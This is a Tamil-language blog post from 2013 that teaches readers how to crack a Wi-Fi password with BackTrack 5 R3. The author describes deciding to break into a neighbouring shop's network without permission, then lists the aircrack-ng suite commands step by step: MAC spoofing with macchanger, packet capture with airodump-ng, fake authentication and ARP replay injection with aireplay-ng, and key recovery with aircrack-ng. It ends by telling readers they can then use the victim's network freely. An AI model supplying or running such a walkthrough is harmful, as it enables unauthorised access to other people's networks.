November 2013 - Tamilish Hacker

Latest Photos

Webp-net-gifmaker

November 28, 2013

Wi-Fi பாஸ்வர்ட்டை ஹாக் செய்வது எப்படி? How to hack Wi-Fi Password? Using Back Track 5 r3

Thursday, November 28, 2013 0
Wi-Fi  பாஸ்வர்ட்டை ஹாக் செய்வது எப்படி? How to hack Wi-Fi Password? Using Back Track 5 r3
அப்பாடா நான் சொன்னேன்ல அடுத்த பதிவு இதுதான்னு. நான் நேத்து டவுன் பக்கமா போனே அங்க என் நன்பர் என்ன வர சொல்லியிருந்தாரு.  அவரு ஒரு சீடி ஷாப் வச்சிருக்காரு. அவருக்கு ஒரு சாப்ட்வெயார் வேணுமாம் அத என்கிட்ட கேட்டாரு. ஆனா அந்த சாப்ட்வெயார் நம்மகிட்ட இல்ல. டவுன்லோட்தான் பன்னனும். அதுக்கு டேட்டா பேலன்ஸ் போதாது. ஆனா அவரோட கடைக்கு பக்கத்து கடையில Wi-fi இருந்துசி. எப்புடியாவது அத டவுன்லோட் பன்ன அவரோட Wi-Fi Password ஹாக் பன்ன முடிவு செஞ்சேன். அதோட பேஸ்புக்லயும் இதபத்தி ஒருத்தர் கேட்டிருந்தாரு. அதான் டிரை பன்னி பாக்கலான்னு லாப்டாப்ல உக்காந்தேன்.

ரொம்ப நாளைக்கு பிறகு சந்திக்கிறதால என்னோட ஆப்பரேட்டிங் சிஸ்டத்த பத்தி சொல்ல முடியல. என்னோட அப்பரேடிங் சிஸ்டம் Back Track 5 R3. இது லினாக் நிறுவனத்தால தார ஆப்பரேட்டிங் சிஸ்டம். எல்லாமே ஓப்பன் சோஸ். அதனால நாமலே அத தேவையான மாதிரி வடிவமச்சிக்கலாம். இந்த  Back Track 5 R3 ல இருக்க இன்னொரு விசேஷம்தான் ஹக்கர்ஸ் அதிகளவில பயன்படுத்துற ஆப்பரேட்டிங் சிஸ்டம். நமக்கு அதுலதானே ஆர்வம் அதான் அத பாவிக்கிறேன்.

நீங்களும் பாவிக்கலாம். பயப்படாதிங்க. இத Virtual Box ல போட்டு பாவிச்சிங்கனா நீங்க அன்றாடம் செய்யுற எந்த வேலைக்கும் பாதிப்பு வராது. Virtual Box ல Virtual Machine ஒன்னு உருவாக்குறது எப்பிடின்னு பாக்க இந்த பதிவ பார்த்து புரிஞ்சிகோங்க. இந்த  Back Track 5 R3 ஆப்பரேட்டிங் சிஸ்டத்த இந்த லிங்ல போய் டவுன்லோட் பன்னிக்கோங்க.

அப்பறம் ரொம்ப பேசியாச்சி விஷயத்த பாப்பம் எனா?
சரி நீங்க  Back Track 5 R3  போட்டுகிட்டிங்க தானே? அதுல Shell Command ஒன்ன ஓப்பன் பன்னிக்கோங்க. அதுல "airmon-ng" Command ஐ கொடுத்திங்கனா அந்த சந்தர்ப்பத்துல இருக்கிற Wi-Fi Networks காட்டும்.





மேல பாத்திங்கலா? அதுல "ra0" னு காட்டுறதுதான் Wi-Fi Network. இத போல நீங்க இருக்குற இடத்துல உள்ள எல்லா Wi-Fi Networkசையும் காட்டும்.



அப்பறமா "airmon-ng stop ra0" இந்த Command ஐ கொடுத்திங்கனா நல்லது. எதுக்குடா இதுன்னு பாக்குறீங்களா? நாம ஹக் பன்னபோற Wi-Fi Network ன் Mac Address ஐ மாத்த போறம்.



அதுக்கு "ifconfig ra0 down" Command ஐ கொடுங்க.



அப்பறமா "macchanger --mac 00:11:22:33:44:55 ra0" Command ஐ கொடுங்க.



அப்பறமா "airmon-ng start ra0" Command ஐ கொடுங்க. இது எதுக்கு தெரியுமா? நாம மாத்துன Mac Address சரியா வேலை செய்யுதான்னு பாக்கதான்.  "airmon-ng start ra0" Command ஐ கொடுங்க.


அப்பறமா "airodump-ng ra0" Command ஐ கொடுங்க. அப்பறமா கீழ வாற மாதிரி ஒரு விண்டோ வரும் அதுல வார BSSID Code ஐ காப்பி பன்னி வச்சிகோங்க. அது அப்பறமா தேவைப்படலாம்.



பிறகு "airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0"  இதயும் கொடுத்துருங்க. முக்கியமா கொடுக்க முன்னாடி சிவப்பு நிறத்துல காட்டுற எல்லாத்தையும் சந்தர்ப்பத்திற்கேற்ப மாத்தி கொடுங்க. அப்பத்தான் அது வர்க் ஆகும்.


இப்பத்தான் முக்கியமான கட்டம். இப்ப நாம ஹாக் பன்ன போற Wi-Fi Network  ல இப்ப வர்க் பன்ற ஒருத்தர நாம தேட போறம். அத பன்றதுக்கு "aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0" இந்த கம்மாண்ட்அ கொடுங்க.



அப்பறமா "aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0 " இதயும் கொடுங்க.


 கடைசியா "aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)" இதயும் கொடுங்க.
அவ்வளவுதான். கீழ படத்த பாருங்க.


இனி உங்களுக்கு தேவையான அனைத்து வேலைகளையும் அந்த நெட்வர்க்க பாவிச்சி செஞ்சி பாக்கலாம்.